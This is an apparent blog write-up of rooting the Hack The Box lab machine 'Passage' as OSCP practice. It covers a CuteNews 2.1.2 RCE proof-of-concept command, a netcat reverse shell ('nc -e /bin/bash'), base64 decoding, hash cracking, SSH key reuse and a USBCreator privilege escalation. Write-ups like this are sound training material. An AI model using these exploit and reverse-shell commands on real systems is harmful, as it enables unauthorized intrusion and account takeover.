I am in the midst of my pursuit for the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on Hack The Box (HTB) platform. HTB is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.

I will be attempting another Medium ranked box today: Passage!

First up, I will perform my usual Nmap scan:

The Nmap scan revealed that ports 22 and 80 are open. I visited port 80 and was greeted with this page:

At the bottom of the site, I saw that CuteNews powered it. After researching about it online, I came to know that /CuteNews is the default login page. I accessed it, and it worked! I was greeted with the login page, which revealed the version of CuteNews that was being used: 2.1.2

By Googling that version, I found that it is vulnerable to Remote Code Execution (RCE). I found a Proof Of Concept (POC) on Github, which requires user authentication. Therefore, I exploited it with the following steps:

I used this command: python3 CVE-2019-11447.py hri password http://10.10.10.206/CuteNews/index.php and got a shell!

Then, I used Bash and Netcat to open a proper shell:
nc -e /bin/bash ip addr 4444

In another terminal, I opened Netcat:
nc -nlvp 4444

These were the results:

It’s time to perform some scanning! I found 2 users: nadav and paul. However, I did not have permission to access them:

I ended up finding the directory users and there were multiple interesting files in it. However, they were all encoded with Base64:

I decided to cat * and extract all information that was not a hash. Then, I used CyberChef to decode the hashes:

Using this, I looked for nadav and paul and found their password hashes:
Nadav:

Paul:

I entered both hashes in CrackStation. However, I only managed to retrieve the password of Paul:

I managed to retrieve the user hash by logging into the user account Paul:

After many hours of enumerating, I decided to check the .ssh for the authorized keys and realised that I could access nadav’s account from Paul:

So, I decided to SSH in and it worked!

I decided to run Linpeas to find out what steps I could take next. I figured I could exploit the USBCreator of the machine:

I managed to find a POC which I used to successfully root the box!